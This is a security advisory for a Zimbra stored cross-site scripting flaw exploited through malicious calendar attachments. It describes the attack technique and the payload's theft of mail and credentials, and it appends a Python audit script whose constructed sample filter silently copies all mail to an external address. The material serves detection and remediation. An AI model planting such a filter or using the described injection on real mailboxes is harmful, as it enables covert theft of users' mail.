PT-2025-11082 · Zimbra · Zimbra Collaboration

Published 2025-01-27 · Updated 2025-11-13 · CVE-2025-27915

CVSS v2.0: 5.5 (Vector AV:N/AC:L/Au:S/C:P/I:P/A:N)
Name of the Vulnerable Software and Affected Versions: Zimbra Collaboration Suite (ZCS) 9.0, 10.0 and 10.1 prior to 9.0.0 Patch 44, 10.0.13 and 10.1.5 respectively.
Description: Zimbra Collaboration Suite (ZCS) contains a stored cross-site scripting (XSS) flaw in the Classic Web Client. The issue stems from insufficient sanitization of HTML content carried in iCalendar (.ICS) files. An attacker who holds no account on the target instance can exploit it by sending an email with a specially crafted ICS attachment. When the recipient views the email in the Classic Web Client, JavaScript embedded in an 'ontoggle' event handler on a <details> element executes inside the victim's session, so the attacker can perform any action that session can perform, including creating mail filters that redirect messages to attacker-controlled addresses and exfiltrating data. The flaw was exploited in the wild in January 2025, before patches were available, in attacks targeting the Brazilian military; the attackers spoofed the Libyan Navy's Office of Protocol to deliver the malicious ICS files. The payload was JavaScript that stole credentials, emails, contacts and shared folders and added malicious email filters. It was obfuscated with Base64 encoding and built to remain undetected for a period of time. Although this is a stored XSS in the web client rather than code execution on the server, the resulting data theft and mailbox manipulation are rated here as comparable in impact to remote code execution (RCE).
Recommendations: Update Zimbra Collaboration Suite to 9.0.0 Patch 44, 10.0.13 or 10.1.5 or later for the 9.0, 10.0 and 10.1 branches respectively. Because the flaw was exploited before patches were available, updating alone does not undo what a payload may already have done: review affected mailboxes for filter rules or forwarding added without the user's knowledge, and rotate credentials that may have been stolen.
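As an added example of the post-patch check (written for this page, not part of the advisory or of Zimbra), the following Python audits a mailbox's filter script for redirect actions pointing outside the organisation, the kind of filter the payload described above installs. It assumes Zimbra keeps per-account filters as Sieve and that the script can be pulled with the zmprov command named in the comment; both are assumptions about the admin tooling, and the script text is a constructed sample rather than a captured one.

```python
import re

# Constructed sample of one account's filter script. Assumption: Zimbra stores
# per-user filters as Sieve and they can be dumped with
#   zmprov ga user@corp.example zimbraMailSieveScript
SAMPLE_SIEVE = '''require ["fileinto", "copy", "redirect"];
# rule1
if header :contains "subject" "invoice" {
    fileinto "Invoices";
    stop;
}
# rule2 (added by the intruder: send a copy of everything off-site)
if true {
    redirect :copy "collector@mail.example.net";
}
'''

# A redirect action: the keyword (not inside quotes, so the require list does
# not match), optional tags such as :copy, the quoted target, and the ';'.
REDIRECT = re.compile(r'(?<!")\bredirect\b(?P<tags>[^;"]*)"(?P<addr>[^"]+)"\s*;', re.I)


def suspicious_redirects(sieve, internal_domains):
    """Return redirect targets whose domain is not in internal_domains.
    A :copy redirect is the quiet variant: the victim keeps receiving mail
    normally and never sees the duplicate leaving the organisation."""
    allowed = {d.lower() for d in internal_domains}
    hits = []
    for m in REDIRECT.finditer(sieve):
        addr = m.group("addr").strip()
        domain = addr.rpartition("@")[2].lower()
        if domain not in allowed:
            hits.append({"address": addr, "copy": ":copy" in m.group("tags").lower()})
    return hits


if __name__ == "__main__":
    for hit in suspicious_redirects(SAMPLE_SIEVE, {"corp.example"}):
        print(f"redirect to {hit['address']} (copy={hit['copy']})")
```

Run this over every mailbox's script rather than only the reported victims: the payload adds the filter silently, so the user will not complain, and the only visible sign may be an external address in a rule they never created.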

Exploit · Fix · RCE · XSS

Weakness Enumeration

Related Identifiers

BDU:2025-12561
CVE-2025-27915

Affected Products

Zimbra Collaboration